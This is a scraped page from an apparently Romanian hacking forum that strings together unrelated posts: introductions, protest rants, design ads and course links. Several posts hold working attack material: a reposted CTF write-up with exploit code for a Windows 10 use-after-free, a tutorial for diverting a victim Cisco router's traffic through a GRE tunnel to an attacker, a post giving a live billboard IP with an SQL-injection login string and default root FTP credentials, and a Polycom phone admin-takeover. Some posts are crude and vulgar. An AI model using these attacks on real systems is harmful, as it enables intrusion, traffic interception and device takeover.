Leaderboard

Vă salut băieți ,bine v-am găsit; Mă numesc Tudor sint din Republica Moldova am 20 de ani ,vreau ca fiind activ pe aici dînd întrebări și aflînd răspuns să învăt cit mai multe în programare pentru ca sint la un nivel scăzut îmi doresc să progresez. Anterior nu m-am ocupat cu asa ceva și îmi e dificil. Ceva vreme în urmă fiind un simplu hobby am editat pentru echipa de editare RPES (Romanian Pro Evolution Soccer )fiind membru al echipei in fine n-are nici o treabă asta. Îmi doresc ca să învăt și să ne înțelegem, Momentam aș vrea tot de la 0 să învăt ceea ce ține de C; P.S:Vreau să îmi cer iertare înainte poate de greșelile de exprimate ă gîndurilor și felul de a vorbi romana . Va multumesc anticipat

Lui Ion nu ii curge scuipat din gura de prost si nu isi pierde vremea pe toate site-urile de petitii online aparute ca ciupercile dupa ploaie. Ion stie ca asa-zisele petitii sunt egale cu 0 si pe cei din legislativ si executiv ii doare fix in 3 litere de astfel de petitii. Ion stie ca pentru a avea efect, astfel de petitii trebuie recunoscute in mod oficial, gen https://petition.parliament.uk/petitions Ion mai si citeste T&C pe site-urile care s-au obosit sa le scrie si intelege ca astfel de mizerii sunt facute exclusiv pentru a colecta adrese de mail valide a prostimii pe anumite nise (destul de pretioase in ziua de azi). Si nu in ultimul rand, Ion stie ca datul de like si share pe Facebook sau retweet sau click pe o "petitie" online este egal cu zero barat si ca trebuie defapt sa exprime acest lucru in mod vocal, in strada. Fiti ca Ion!

Exploiting a misused C++ shared pointer on Windows 10 In this post I describe a detailed solution to my “winworld” challenge from Insomni’hack CTF Teaser 2017. winworld was a x64 windows binary coded in C++11 and with most of Windows 10 built-in protections enabled, notably AppContainer (through the awesome AppJailLauncher), Control Flow Guard and the recent mitigation policies. These can quickly be verified using Process Hacker (note also the reserved 2TB of CFGBitmap!): The task was running on Windows Server 2016, which as far as the challenge is concerned behaves exactly as Windows 10 and even uses the exact same libraries. The challenge and description (now with the source code) can be found here Logic of the binary: Our theme this year was “rise of the machines”; winworld is about the recent Westworld TV show, and implements a “narrator” interface where you can create robots and humans, configure their behavior, and move them on a map where they interact with each other. The narrator manipulates Person objects, which is a shared class for both “hosts” (robots) and “guests” (humans). Each type is stored in separate list. Each Person object has the following attributes: The narrator exposes the following commands: --[ Welcome to Winworld, park no 1209 ]-- narrator [day 1]$ help Available commands: - new <type> <sex> <name> - clone <id> <new_name> - list <hosts|guests> - info <id> - update <id> <attribute> <value> - friend <add|remove> <id 1> <id 2> - sentence <add|remove> <id> <sentence> - map - move <id> {<l|r|u|d>+} - random_move - next_day - help - prompt <show|hide> - quit narrator [day 1]$ The action happens during calls to move or random_move whenever 2 persons meet. The onEncounter method pointer is called and they interact. Only attack actually has impact on the other Person object: if the attack is successful the other takes damage and possibly dies. Robots can die an infinite number of times but cannot kill humans. Humans only live once and can kill other humans. The next_day feature restores the lives of robots and the health of everyone, but if the object is a dead human, it gets removed from its list. People talk in an automated way using a Markov Chain that is initialized with the full Westworld script and the added sentences, which may incur in fun conversations. Many sentences still don’t quite make sense though, and since the vulnerabilities aren’t in there, I specified it in the description to spare some reversing time (there is already plenty of C++ to reverse…). Vulnerability 1: uninitialized attribute in the Person copy constructor During the Narrator initialization, the map is randomly generated and a specific point is chosen as the “maze center”, special point that when reached under certain conditions, turns a robot into a human. These conditions are that the currently moved Person must be a HOST, have is_conscious set, and there must be a human (GUEST) on the maze center too. First thing is thus to find that point. All randomized data is obtained with rand(), and the seed is initialized with a classic srand(time(NULL)). Therefore the seed can be determined easily by trying a few seconds before and after the local machine time. Once synchronized with the server’s clock, simply replaying the map initialization algorithm in the exploit will finally allow to find the rand() values used to generate the maze center. Coding a simple pathfinding algorithm then allows to walk any person to this position. Robots are initialized with is_conscious = false in the Person::Personconstructor. However the Person::Person *copy* constructor used in the narrator’s clone function forgets to do this initialization! The value will thus be uninitialized and use whatever was already on the heap. It turns out that just cloning a robot is often enough to get is_conscious != 0… but let’s make sure it always is. Sometimes the newly cloned robot will end up on the Low Fragmentation Heap, sometimes not. Best is then to make sure it always ends up on the LFH by cloning 0x10 – number of current Person objets = 6. Let’s clone 6+1 times a person and check in windbg: 0:004> ? winworld!Person::Person Matched: 00007ff7`9b9ee700 winworld!Person::Person (<no parameter info>) Matched: 00007ff7`9b9ee880 winworld!Person::Person (<no parameter info>) Ambiguous symbol error at 'winworld!Person::Person' 0:004> bp 00007ff7`9b9ee880 "r rcx ; g" ; bp winworld!Person::printInfos ; g rcx=0000024a826a3850 rcx=0000024a826800c0 rcx=0000024a82674130 rcx=0000024a82674310 rcx=0000024a82673a50 rcx=0000024a82673910 rcx=0000024a82673d70 Breakpoint 1 hit winworld!Person::printInfos: 00007ff7`9b9f0890 4c8bdc mov r11,rsp 0:000> r rcx rcx=0000024a82673d70 0:000> !heap -x 0000024a826800c0 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 0000024a826800b0 0000024a826800c0 0000024a82610000 0000024a82610000 a0 120 10 busy 0:000> !heap -x 0000024a82673d70 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 0000024a82673d60 0000024a82673d70 0000024a82610000 0000024a828dec10 a0 - 10 LFH;busy Here we see that the first 2 clones aren’t on the LFH, while the remaining ones are. The LFH allocations are randomized, which could add some challenge. However these allocations are randomized using an array of size 0x100 with a position that is incremented modulo 0x100, meaning that if we spray 0x100 elements of the right size, we will come back to the same position and thus get a deterministic behavior. We don’t even need to keep the chunks in memory, so we can simply spray using a command string of size 0x90 (same as Person), which will always initialize the is_conscious attribute for the upcoming clone operation. So now our robot becomes human, and the troubles begin! Note: It seems that by default Visual Studio 2015 enables the /sdl compilation flag, which will actually add a memset to fill the newly allocated Person object with zeros, and thus makes it unexploitable. I disabled it But to be fair, I enabled CFG which isn’t default! Vulnerability 2: misused std::shared_ptr A shared pointer is basically a wrapper around a pointer to an object. It notably adds a reference counter that gets incremented whenever the shared_ptr is associated to a new variable, and decremented when that variable goes out of scope. When the reference counter becomes 0, no more references to the object are supposed to exist anywhere in the program, so it automatically frees it. This is very useful against bugs like Use After Free. It is however still possible to be dumb with these smart pointers… in this challenge, when a robot becomes human, it stays in the robots list (but its is_enable field becomes false so it cannot be used as a robot anymore), and gets inserted into the humans list with the following code: This is very wrong because instead of incrementing the reference counter of the object’s shared_ptr, we instead create a new shared_ptr that points to the same object: When the reference counter of any of the two shared_ptr gets decremented to 0, the object gets freed and since the other shared_ptr is still active, we will get a Use After Free! To do so, we can kill the human-robot using another human. We also have to remove all his friends otherwise the reference counter will not reach 0. Then using the next_dayfunction will free it when it removes the pointer from the guests vector: So now getting RIP should be easy since the object holds a method pointer: spray 0x100 strings of length 0x90 with a fake object – a std::string can also contain null bytes – and then move the dead human-robot left-right so he meets his killer again, and triggers the overwritten onEncountermethod pointer: def craft_person(func_ptr, leak_addr, size): payload = struct.pack("<Q", func_ptr) # func pointer payload += "\x00" * 24 # friends std::vector payload += "\x00" * 24 # sentences std::vector # std::string name payload += struct.pack("<Q", leak_addr) payload += "JUNKJUNK" payload += struct.pack("<Q", size) # size payload += struct.pack("<Q", size) # max_size payload += struct.pack("<I", 1) # type = GUEST payload += struct.pack("<I", 1) # sex payload += "\x01" # is_alive payload += "\x01" # is_conscious payload += "\x01" # is_enabled [...] payload = craft_person(func_ptr=0x4242424242424242, leak_addr=0, size=0) for i in range(0x100): sendline(s, payload) sendline(s, "move h7 lr") Result: 0:004> g (1a00.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ntdll!LdrpValidateUserCallTarget+0xe: 00007ffa`89b164ae 488b14c2 mov rdx,qword ptr [rdx+rax*8] ds:010986ff`08d30908=???????????????? 0:000> ? rax << 9 Evaluate expression: 4774451407313060352 = 42424242`42424200 Control Flow Guard is going to complicate things a bit, but before that we still need to leak one address to defeat ASLR. Leaking the binary base address In the previous code sample we crafted a name std::string of size 0 to prevent the binary from crashing when printing the name. Replacing the pointer and size with valid values will print size bytes at that address, therefore we got our arbitrary read primitive. Now what do we print? There is ASLR everywhere except for the _KUSER_SHARED_DATA at 0x7ffe0000, which doesn’t hold any pointer anymore on Windows 10… Instead of exploiting our UAF with a string we must therefore replace the freed Person object with another object of the same LFH size (0xa0). We don’t have any, but we can check if we could increase the size of one of our vectors instead. Iteratively trying with our std::vector<std::shared_ptr<Person>> friends, we get lucky with 7 to 9 friends: to 9 friends: 0:004> g Breakpoint 0 hit winworld!Person::printInfos: 00007ff7`9b9f0890 4c8bdc mov r11,rsp 0:000> dq rcx 000001cf`94daea60 00007ff7`9b9ef700 000001cf`94d949b0 000001cf`94daea70 000001cf`94d94a20 000001cf`94d94a40 000001cf`94daea80 000001cf`94dac6c0 000001cf`94dac760 000001cf`94daea90 000001cf`94dac780 00736572`6f6c6f44 000001cf`94daeaa0 61742074`73657567 00000000`00000007 000001cf`94daeab0 00000000`0000000f 00000002`00000000 000001cf`94daeac0 00000000`20010001 00000000`00000000 000001cf`94daead0 0000003d`00000020 0000000a`00000004 0:000> !heap -x 000001cf`94d949b0 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 000001cf94d949a0 000001cf94d949b0 000001cf94d30000 000001cf94dafb50 a0 - 10 LFH;busy 0:000> dq 000001cf`94d949b0 000001cf`94d949b0 000001cf`94dfb410 000001cf`94d90ce0 000001cf`94d949c0 000001cf`94dac580 000001cf`94d90800 000001cf`94d949d0 000001cf`94d98f90 000001cf`94d911c0 000001cf`94d949e0 000001cf`94d99030 000001cf`94d912e0 # string pointer 000001cf`94d949f0 000001cf`94db4cf0 000001cf`94d91180 # string size 000001cf`94d94a00 000001cf`94db7e60 000001cf`94d912a0 000001cf`94d94a10 000001cf`94e97c70 000001cf`94d91300 000001cf`94d94a20 7320756f`590a2e73 73696874`20776f68 0:000> dps poi(000001cf`94d949b0+8+0n24*2) L3 000001cf`94d912e0 00007ff7`9b9f7158 winworld!std::_Ref_count<Person>::`vftable' 000001cf`94d912e8 00000001`00000005 000001cf`94d912f0 000001cf`94d99030 The vector now belongs to the same LFH bucket as Person objects. If we spray 0xf0 strings followed by 0x10 7-friends vectors we will be able to leak pointers: to a vtable inside winworld and to the heap. We should be able to actually do that with 0xff strings then 1 friends vector, but there appears to be some allocations happening in between sometimes – and I haven’t debugged what caused it. We don’t control the size though, which is huge, so the binary will inevitably crash! Good thing is that on Windows libraries are randomized only once per boot, as opposed to the heap, stack etc. that are randomized for each process. This is dirty, but since this binary is restarted automatically it isn’t a problem, so we have leaked the binary base and we can reuse it in subsequent connections. Protip: when you develop a Windows exploit, don’t put the binary on the share to your Linux host, this has the nice side effect of forcing randomization of the binary base at each execution! Call it a mitigation if you want Bypassing Control Flow Guard Control Flow Guard (CFG) is Microsoft’s Control Flow Integrity (CFI) measure, which is based on the simple idea that any indirect call must point to the beginning of a function. A call to __guard_check_icall_fptr is inserted before indirect calls: The advantage of CFG is that it can hardly break a legit program (so, no reason not to use it!). However 3 generic weaknesses are apparent in CFG: The set of allowed targets is still huge, compared to a CFI mechanism that verifies the type of function arguments and return values It cannot possibly protect the stack, since return addresses are not function starts. Microsoft will attempt to fix this with Return Flow Guard and future Intel processor support, but this is not enforced yet. If a loaded module isn’t compiled with CFG support, all the addresses within that modules are set as allowed targets in the CFGBitmap. Problems may also arise with JIT. (here the binary and all DLLs support CFG and there is no JIT) While I was writing this challenge an awesome blog post was published about bypassing CFG, that abuses kernel32!RtlCaptureContext (weakness 1). It turns out that j00ru – only person that solved this task, gg! – used it to leak the stack, but I haven’t, and opted for leaking/writing to the stack manually (weakness 2). We have abused the std::string name attribute for arbitrary read already, now we can also use it to achieve arbitrary write! The only requirement is to replace the string with no more bytes than the max size of the currently crafted std::string object, which is therefore no problem at all. This is cool, however so far we don’t even know where the stack (or even heap) is, and it is randomized on each run of the program as opposed to the libraries. We will come back to this later on. First we also want to leak the addresses of the other libraries that we may want to use in our exploit. Leaking other libraries Using the binary base leak and a spray of 0x100 crafted persons strings we have enough to leak arbitrary memory addresses. We can leave the vectors to null bytes to prevent them from crashing during the call to Person::printInfos. Now that we have the binary base address and that it will stay the same until next reboot, leaking the other libraries is trivial: we can just dump entries in the IAT. My exploit makes use of ucrtbase.dll and ntdll.dll(always in the IAT in the presence of CFG), which can be leaked by crafting a std::string that points to the following addresses: 0:000> dps winworld+162e8 L1 00007ff7`9b9f62e8 00007ffa`86d42360 ucrtbase!strtol 0:000> dps winworld+164c0 L2 00007ff7`9b9f64c0 00007ffa`89b164a0 ntdll!LdrpValidateUserCallTarget 00007ff7`9b9f64c8 00007ffa`89b164f0 ntdll!LdrpDispatchUserCallTarget To repeat the leak we can overwrite the onEncounter method pointer with the address of gets(), once we have located the base address of ucrtbase.dll. This is of course because of the special context of the task that has its standard input/output streams redirected to the client socket. This will trigger a nice gets(this_object) heap overflow that we can use to overwrite the name string attribute in a loop. Leaking the stack Where can we find stack pointers? We can find the PEB pointer from ntdll, however in x64 the PEB structure doesn’t hold any pointer to the TEBs (that contains stack pointers) anymore… A recent blogpost from j00ru described an interesting fact: while there is no good reason to store stack pointers on the heap, there may be some leftover stack data that was inadvertently copied to the heap during process initialization. His post describes it on x86, let’s check if we still have stack pointers lurking on the heap in x64: 0:001> !address [...] BaseAddress EndAddress+1 RegionSize Type State Protect Usage -------------------------------------------------------------------------------------------------------------------------- [...] 3b`b6cfb000 3b`b6d00000 0`00005000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE Stack [~0; 2524.1738] [...] 0:001> !heap Heap Address NT/Segment Heap 17c262d0000 NT Heap 17c26120000 NT Heap 0:001> !address 17c262d0000 Usage: Heap Base Address: 0000017c`262d0000 End Address: 0000017c`26332000 [...] 0:001> .for (r $t0 = 17c`262d0000; @$t0 < 17c`26332000; r $t0 = @$t0 + 8) { .if (poi(@$t0) > 3b`b6cfb000 & poi(@$t0) < 3b`b6d00000) { dps $t0 L1 } } 0000017c`262d2d90 0000003b`b6cff174 0000017c`262deb20 0000003b`b6cffbd8 0000017c`262deb30 0000003b`b6cffbc8 0000017c`262deb80 0000003b`b6cffc30 0000017c`2632cf80 0000003b`b6cff5e0 0000017c`2632cfc0 0000003b`b6cff5e0 0000017c`2632d000 0000003b`b6cff5e0 0000017c`2632d1a0 0000003b`b6cff5e0 0000017c`2632d2c0 0000003b`b6cff5e0 0000017c`2632d4e0 0000003b`b6cff5e0 0000017c`2632d600 0000003b`b6cff5e0 0000017c`2632d660 0000003b`b6cff5e0 0000017c`2632d6e0 0000003b`b6cff5e0 0000017c`2632d700 0000003b`b6cff5e0 0:000> dps winworld+1fbd0 L3 00007ff7`9b9ffbd0 0000017c`2632ca80 00007ff7`9b9ffbd8 0000017c`262da050 00007ff7`9b9ffbe0 0000017c`2632cf20 Yes! We indeed still have stack pointers on the default heap, and we can leak an address from that heap at static offsets from our winworld base address. Now we can just browse heap pages and try to find these stack addresses. In my exploit for simplicity I used a simple heuristic that finds QWORDS that are located below the heap but also above 1`00000000, and interactively ask which one to choose as a stack leak. This can obviously be improved. Next step is to dump the stack until we find the targeted return address, craft our std::string to point to that exact address, and use the “update <id> name ropchain” feature to write a ropchain! Mitigation policies & ROP Now that we have both an arbitrary write and the exact address where we can overwrite a saved RIP on the stack, all that is left is build a ROP chain. Several ideas to do it: VirtualProtect then shellcode LoadLibrary of a library over SMB Execute a shell command (WinExec etc.) Full ROP to read the flag As mentioned earlier the binary has some of the recent mitigation policies in our context the following ones are relevant: ProcessDynamicCodePolicy : prevents inserting new executable memory → VirtualProtect will fail ProcessSignaturePolicy : libraries must be signed → prevents LoadLibrary ProcessImageLoadPolicy : libraries cannot be loaded from a remote location → prevents LoadLibrary over SMB The two last options are still available. I also wanted to add a call to UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY in the parent AppJailLauncherprocess – which would prevent winworld from creating new processes – but since it is a console application, spawning winworld also creates a conhost.exe process. Using this mitigation prevents the creation of the conhost.exe process and therefore the application cannot run. My solution reads the flag directly in the ROP chain. Since I didn’t want to go through all the trouble of CreateFile and Windows handles, I instead used the _sopen_s / _read / puts / _flushall functions located in ucrtbase.dll that have classic POSIX-style file descriptors (aka 0x3). Looking for gadgets in ntdll we can find a perfect gadget that pop the first four registers used in the x64 calling convention. Interestingly the gadget turns out to be in CFG itself, which was a scary surprise while single stepping through the rop chain… 0:000> u ntdll+96470 L5 ntdll!LdrpHandleInvalidUserCallTarget+0x70: 00007ffa`89b16470 5a pop rdx 00007ffa`89b16471 59 pop rcx 00007ffa`89b16472 4158 pop r8 00007ffa`89b16474 4159 pop r9 00007ffa`89b16476 c3 ret Putting it all together we finally get the following: Z:\awe\insomnihack\2017\winworld>python sploit.py getflag remote [+] Discovering the PRNG seed... Clock not synced with server... [+] Resynced clock, delay of -21 seconds [+] Found the maze center: (38, 41) [+] Check the map for people positions [+] Make sure that LFH is enabled for bucket of sizeof(Person) 6 / 6 ... [+] Spray 0x100 std::string to force future initialization of pwnrobot->is_conscious 256 / 256 ... [+] Cloning host, with uninitialized memory this one should have is_conscious... [+] Removing current friends of pwnrobot... [+] Moving a guest to the maze center (37, 86) -> (38, 41)... [+] Moving our host to the maze center (38, 29) -> (38, 41)... [+] pwnrobot should now be a human... kill him! [+] Removing all pwnrobot's friends... 7 / 7 ... [+] Decrement the refcount of pwnrobot's human share_ptr to 0 -> free it [+] Spray 0x100 std::string to trigger UAF 256 / 256 ... [+] heap leak: 0x18a6eae8b40 [+] Leaking stack ptr... [+] Dumping heap @ 0x18a6eae6b40... [+] Dumping heap @ 0x18a6eae7b40... [HEAP] 0x18a6eae7b40 [00] - 0x18a6ea96c72 [01] - 0x18a6ea9c550 [02] - 0x18a6ea9e6e0 Use which qword as stack leak? [+] Dumping heap @ 0x18a6eae8b40... [HEAP] 0x18a6eae8b40 [00] - 0x3ab7faf120 [01] - 0x3ab7faf4f0 [02] - 0x18a6ea9c550 [03] - 0x18a6eae84c0 [04] - 0x18a6eae8560 [05] - 0x18a6eae8760 Use which qword as stack leak? 1 [+] stack @ 0x3ab7faf4f0 [+] Leaking stack content... [-] Haven't found saved RIP on the stack. Increment stack pointer... [-] Haven't found saved RIP on the stack. Increment stack pointer... [-] Haven't found saved RIP on the stack. Increment stack pointer... RIP at offset 0x8 [+] Overwrite stack with ROPchain... [+] Trigger ROP chain... Better not forget to initialize a robot's memory! Flag: INS{I pwn, therefore I am!} [+] Exploit completed. Conclusions You can find the full exploit here . sourca : https://blog.scrt.ch/2017/01/27/exploiting-a-misused-c-shared-pointer-on-windows-10/ thecount.

:))))))))))))) Dezinformare, sunt basist sefu' Hahahahah

Dupa cum spune si titlul, vand servicii de graphic design. Programe folosite: suita adobe Aici puteti vedea cateva din creatiile mele: https://www.facebook.com/alezudesign As dori sa se posteze aici doar feedback-urile. Cererile si intrebarile in privat. Multumesc

O sa urmeze o serie de Tutoriale Cisco. Le voi posta in acest thread. Sa luam un caz concret. La ce va ajuta daca aveti acces la un Router Cisco?! In primul rand, tot traficul va trece prin acel Router, dar cum ati putea intercepta tot acest trafic, avand in vedere ca nu este langa dvs(altfel am folosi direct un wireshark si am rezolva problema)?! Pentru asta exista Gre Tunnel. Ce este acest Gre tunnel? Pai un tunnel Virtual intre 2 routere. Generic Routing Encapsulation - Wikipedia, the free encyclopedia Luam imaginea urmatoare: http://img18.imageshack.us/img18/2343/ciscofun1.jpg Vrem sa trimitem tot traficul victimei catre routerul nostru, astfel incat noi sa putem intercepta tot traficul. Avand acces la routerul victimei configuram astfel routerul: Construim tunnelul Gre pe Routerul Victimei: conf t //intram in interfata de configurare interface tunnel0 //facem interfata virtual de tunnel ip address 192.168.10.1 255.255.255.0 //punem un ip interfetei virtuale tunnel source e0/0 //spunem de unde pleaca traficul tunnel destination 80.179.20.55 //si unde se duce Apoi trebuie sa ii spunem routerului ce informatii sa filtreze: access-list 101 permit tcp any any eq 443 // facem o regula de acces ce trebuie sa filtreze access-list 101 permit tcp any any eq 80 // routereul, am hotarat sa primim informatii doar access-list 101 permit tcp any any eq 21 //daca se primesc pachete pe porturile 80,21,.. access-list 101 permit tcp any any eq 20 access-list 101 permit tcp any any eq 23 access-list 101 permit tcp any any eq 25 access-list 101 permit tcp any any eq 110 Sa va explic a 2a comanda: access-list 101 permit tcp any any eq 80 Prin aceasta ii spunem sa filtreze doar pachetele TCP ce au orice sursa si se duc catre orice destinatie, iar portul destinatie este 80. Aplicam aceasta regula(access-list) pe interfata: router-map divert-traffic // Cream o regula(o regula pentru a fowarda traficul match ip address 101 //Spunem sa filtreze dupa acces-list 101 interface Ethernet0/0 //intram in interfata e0/0 ip policy route-map divert-traffic //aplicam regula pe interfata de iesire catre internet Apoi configuram pe routerul nostrul doar Gre tunnel: Attacker(config)# interface tunnel0 Attacker(config-if)# ip address 192.168.10.2 255.255.255.0 Attacker(config-if)# tunnel source Ethernet0/0 Attacker(config-if)# tunnel destination 21.199.146.242 Tot ce mai trebuie sa facem este sa ascultam traficul cu un wireshark conectat la router.

Step 1. Register to shodan Step 2. Look up: title:"lednet live system" You'll find some! Example: 186.206.188.175:8060/en/main.html How to hack it? Well the Username Parameter is vulnerable to SQL Injection...... So to login, paste -1558" OR 9005=9005 AND "UxGI"="UxGI in the username parameter and anything in the password input. Now click login! Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards.... Username: root Password: 111111 $ ftp 186.206.188.175 Connected to 186.206.188.175. 220 Welcome to blah FTP service. Name (186.206.188.175): root 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||41314|). 150 Here comes the directory listing. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d drwxr-xr-x 7 0 0 0 May 21 18:08 dev lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e drwxr-xr-x 1 0 0 748 Jan 01 1970 etc lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f drwxr-xr-x 1 0 0 36 Jan 01 1970 home drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt drwxr-xr-x 1 0 0 0 Jan 01 1970 opt dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc drwxr-xr-x 1 0 0 116 Jan 01 1970 root drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin drwxr-xr-x 12 0 0 0 Jan 01 1970 sys drwxrwxrwt 6 0 0 720 May 21 18:16 tmp drwxr-xr-x 1 0 0 108 Jan 01 1970 usr drwxr-xr-x 3 0 0 672 Jan 01 1970 var drwxr-xr-x 4 0 0 288 Jan 01 1970 www 226 Directory send OK. ftp> Copiat de le HF...

Acum doi ani am făcut un site despre conturi premium dar crezut ca nu va funcționa, azi am văzut ca după atat timp inca mai am lume pe site. Am început sa postez din nou pe el si acum o sa ma țin. http://charged-accounts.blogspot.com

http://thehackernews.tradepub.com/free/w_wile229/prgm.cgi?a=1 https://mega.nz/#!w1twHIYK!vCxN4nTn8To-3SrIr8QozVBWX6J3qkQaeskWHE7EvMs

https://dribbble.com/shots/1400468-Fox

Tine-o tot asa Alezu!

Ceva funny: si hai la protest !

Hai salut, Nu stiu daca a mai fost postat, dar am gasit ceva interesant pe net, pentru entry-level sa zic asa, cautand sa invat putin mai mult Python. http://www.pythonchallenge.com Primele levele sunt usoare, am reusit pana la 3, fiind descoperit doar in seara asta. Exista pe net rezolvari, dar ar fi frumos totusi sa nu va uitati si sa-mi spuneti si mie cum le rezolvati, pentru fiecare nivel in parte, ca poate invat si eu ceva nou. Apropo, pot fi rezolvate si pe foaie, fara sa fie nevoie de cod, dar e mai greu si mai "babesc".

http://prntscr.com/e3yjro

Pentru cei care nu inteleg: https://www.facebook.com/ioana.chitu.5/videos/10154591999362912/ Ceva amuzant: https://www.facebook.com/viceromania/videos/1462295087128108/?hc_ref=NEWSFEED

Foloseste: Nu trebuia sa ne precizezi ca esti un golan, mi s-au ridicat flocii dupa spate, tristut. In primul rand cu golaneala nu faci nimic, nu stiu cum merge pe la voi p'acolo cred ca aelius stie (parca p'acolo sta), ia du-te la scoala baga-te pe un profil de mate-info/cursuri cum au aia pe acolo, invata si fa proiectele pe care profesorii te pun sa le faci, altfel vei sterge si tu curu' la ceva german imputit ( asta daca esti copil, ceea ce cred ca esti ). Iar daca nu esti copil si legat de povestirea ta ca tu lucri acolo, poi incepem iarasi de la precizarea ca esti un golan si daca ai fost golan si in tinerete si nu ti-ai folosit capul cam greu il poti porni sa mai inveti ceva in domeniul asta, nu zic ca nu se poate, dar trebuie chef si vointa, ma puteti injura n-am bai ). Eu unu ma rog pentru tine sa nu ne fi mintit in legatura cu varsta ta, mai exista o sansa sa iti faci un viitor "misto", succes.

Sunt la munca si productivitatea e 0 in toata echipa. Nimeni nu poate sa se mai concentreze, toti asteptam ora 18 sa ne ducem la protest.

- Daca vezi un om ca arunca mizeria la cos, baga-i pula in gura si injura-l pe nenorocit, cum isi permite sa fie civilizat - Daca iti vezi vecinul muncind, nu te lua dupa fraier. Nu e un motiv sa faci ca el - Munca l-a facut pe om, dar nici lenea nu l-a omorat - Pandeste fiecare fraier la semafor si claxoneaza-l. Deschide repede geamul si baga-i pula in gura. Ce cauta pe strada? Sa stea in ma-sa acasa. - Mergi pe strada si asculta florin salam pe telefon in timp ce te scarpini la pula - Scuipa, mananca seminte prin mijloacele de transport in comun, da-i in ma-sa pe ceilalti. - Insala pe toata lumea, fura papornitele pensionarelor pe strada. Da-i in mortu lor pe toti. Banu se face pe mangleala. - Fura capacele canalelor si vinde-le. Sunt de fonta si faci bani frumosi cu ele. Si da, politicienii sunt vinovati pentru asta. Fii roman adevarat. Prin natura noastra suntem hoti, curve, spagari si nesimtiti. Nu lasa strainii sa ne fure obiceiurile si traditia. Ai postat mizeria asta la tutoriale. Da ce cacat crezi ca e ma aici ? Forum de smenari?

@u0m3: Inainte sa pui intrebari impertinente, pui mana si faci putin research sa vezi cate proteste pasnice au schimbat ceva. E o diferenta intre Local Combat si ce sugeram eu.

Cacat! Am uitat sa trec prin Tor PS: M-am uitat pe cateva filmari, se vad multe fete, dar NU recunosc pe nimeni din PCH (Peluza Catalin Hildan), desi din vedere ii stiu pe multi dintre ei.

Rog Biserica sa modifice porunca numarul 8: in

# Exploit Title: Polycom VVX Web Interface - Change Admin Password as User # Date: January 26, 2017 # Exploit Author: Mike Brown # Vendor Homepage: http://www.polycom.com/ # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436 # CVE : N/A # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface. # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses # and account information. 1. Login with the "User" Account. 2. Navigate to Settings > Change Password. 3. Fill in "Old Password" with the current "User" password. 4. Fill in "New Password" with the new "Admin" account password, and confirm. 5. Using a live HTML editor, inspect the old password field. you will see: <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password"> 6. Change the name field to "120" 7. Click "Save" 8. An error will be shown on screen but you can now log into the Admin account with the new password.

http://bestpsdschool.com/modern-portfolio-layout-design/

1.200 de cursuri online gratuite provenite din cadrul universităților de renume mondial, pentru a te ajuta în dezvoltarea pasiunii pentru care vrei să profesezi. http://www.openculture.com/freeonlinecourses

Video Preview Introduction Secure C 101 Secure C 102 Secure C 103 Code Auditing Linux & Permissions Spectrum Windows Overview Rootkits Reverse Engineering 101 Reverse Engineering 102 Fuzzing 101 Midterm Review Fuzzing 102 Exploitation 101 Exploitation 102 Exploitation 103 Networking 101 Networking 102 Web Exploitation 101 Web Exploitation 102 Web Exploitation 103 Exploitation 104 Exploitation 105 Exam 2 Review Exploitation 106 History of Exploitation Exploitation 107 Social Engineering & Physical Security Digital Forensics & Incident Response Tying All The Things Together http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html

Pana pe 31.12.2016 la orice creatie ofer gratuit cover pentru facebook!

Iti faci cont pe cloudflare, pui link-ul site-ului in cauza, o sa iti dea 2 nameservere. Acum ca ai cele doua nameservere, te duci frumos pe site-ul unde ai cumparat domeniul si pui nameserverele primite de la cloudflare. Done! Astepti propagarea nameserverelor. Pentru mai multe detalii sau sfaturi poti sa imi dai un pm

Confirm, nici la mine nu merge !